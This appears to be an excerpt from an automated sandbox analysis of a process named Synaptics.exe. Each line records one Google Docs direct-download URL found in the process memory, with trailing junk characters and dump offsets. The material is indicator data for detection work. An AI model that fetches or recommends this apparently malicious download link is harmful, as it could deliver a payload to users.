                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTe
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTw
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU.k
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUqp
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV1
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVN
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVP
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVmN
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWLZ
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWd
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWv
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXS
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXps
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYW
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYa
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYg
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ2
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ3W
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZnJ
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZu
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_150xNS
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_MR
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_R
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_Tm
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_e
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_wR
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada.
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaaD
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadackgr
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad0
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadh
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadp
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadamad
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaq
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadat
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb2
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbP
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-CH-
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcL
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcQ
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcT
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcati
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcd
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcellq
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadck-cn
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.c
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.com
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcnd
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadctors
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd-
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd:url0S
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddA
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddC1
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddbox-OV
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddc
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddding
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddp
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.cn0
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.comYV
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeW
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeclic
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadedown
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeightCS
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellemS
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenet
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetl
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloades-c
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadesol
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadesynd
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet$
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen6
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf3
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfu
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgR
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgb
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle.
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgp
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgs
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhB
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhV
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhf
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi2
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadifL
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadion-
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaditx
